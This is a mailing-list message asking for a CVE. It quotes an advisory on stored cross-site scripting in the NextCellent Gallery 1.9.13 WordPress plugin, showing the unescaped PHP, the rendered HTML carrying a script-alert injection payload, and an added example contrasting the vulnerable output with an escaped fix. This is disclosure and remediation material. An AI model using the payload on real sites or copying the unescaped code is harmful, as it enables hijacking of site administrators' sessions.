Message-id: <0B442A5E-3A81-4448-B67F-9CE4E99D713D@me.com>
Date: Wed, 30 Apr 2014 11:42:28 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Re: XSS in NextCellent Gallery 1.9.13 WordPress plugin

Hi All,

Sorry, I should have been more clear. May I have a CVE assigned to this issue?

Thanks!
Larry C$

On Apr 27, 2014, at 8:56 AM, Larry W. Cashdollar <larry0@...com> wrote:

> Title: XSS in NextCellent Gallery 1.9.13 WordPress plugin
> Author: Larry W. Cashdollar, @_larry0
> Download: http://wpgetready.com/nextcellent-gallery/
>
> Vendor Notified: 3/20/2014
>
> CVE: Please assign one at your leisure.
>
> Vulnerability Fixed: 4/24/2014 in Nextcellent Gallery v1.19.18.
>
>
> The user supplied data for the Alt & Title Text field isn't escaped before being printed out in the value field:
>
> Vulnerability:
> From nextcellent-gallery-nextgen-legacy/admin/manage-images.php lines:
> 503 <td <?php echo $attributes ?>>
> 504 <input placeholder=" <?php _e("Alt & title text",'nggallery'); ?>" name="alttext[<?php echo $pid ?>]" type="text" style="width:95%; margin-bottom: 2px;" value="<?php echo stripslashes($picture->alttext) ?>" >
> 505 <textarea placeholder="<?php _e("Description",'nggallery'); ?>" name="description[<?php echo $pid ?>]" style="width:95%; margin: 1px;" rows="2" ><?php echo stripslashes($picture->description) ?></textarea>
> 506 </td>
>
> The HTML code produced is:
>
> <td class='alt_title_desc column-alt_title_desc'> <input placeholder="Alt & title text!" name="alttext[1]" type="text" style="width:95%; margin-bottom: 2px;" value=""><script>alert('hi')</script>"<" /><br/> <textarea placeholder="Description" name="description[1]" style="width:95%; margin: 1px;" rows="2" >"</a><script>alert('hi')</script><a>"</textarea> </td>
> <td class='tags column-tags'><textarea placeholder="Separated by commas"name="tags[1]" style="width:95%;" rows="2"></textarea></td> <td class='exclude column-exclude'><input name="exclude[1]" type="checkbox" value="1" /></td>
>
> A screen shot is shown with the full advisory by following the link below.
>
> Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/nextCellent-gallery-1.9.13/
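Added example, not the plugin's or the advisory's own code: the `value` attribute rendering from manage-images.php reduced to a stand-alone function, beside a version that escapes for the attribute context after stripslashes(). The function names and the `$picture` object are assumed stand-ins; the stored value is the one shown in the advisory's HTML output.

```php
<?php
// Constructed example: how the alttext field reaches the page unescaped,
// and what changes when the value is escaped for an attribute context.

function render_alttext_vulnerable(int $pid, object $picture): string
{
    // As in the advisory: stripslashes() only strips WordPress's added
    // backslashes. It leaves quotes and angle brackets intact, so a stored
    // value can close the attribute and start its own markup.
    return '<input name="alttext[' . $pid . ']" type="text" value="'
        . stripslashes($picture->alttext) . '" />';
}

function render_alttext_fixed(int $pid, object $picture): string
{
    // Unslash first, then escape for an HTML attribute. ENT_QUOTES covers
    // both quote styles; in WordPress, esc_attr() is the usual equivalent.
    $safe = htmlspecialchars(stripslashes($picture->alttext), ENT_QUOTES, 'UTF-8');
    return '<input name="alttext[' . $pid . ']" type="text" value="' . $safe . '" />';
}

// Constructed stand-in for the plugin's image object, holding the value
// from the advisory's rendered HTML.
$picture = (object) ['alttext' => "\"><script>alert('hi')</script>\"<"];

echo render_alttext_vulnerable(1, $picture), PHP_EOL;
echo render_alttext_fixed(1, $picture), PHP_EOL;

// Regression check a maintainer could keep: the escaped rendering must
// not contain a raw tag or an unescaped double quote from the stored value.
$fixed = render_alttext_fixed(1, $picture);
assert(strpos($fixed, '<script') === false);
assert(substr_count($fixed, '"') === 6); // only the six attribute delimiters
```

Running the block with `php -d zend.assertions=1` makes the two assertions active; without that setting PHP skips them.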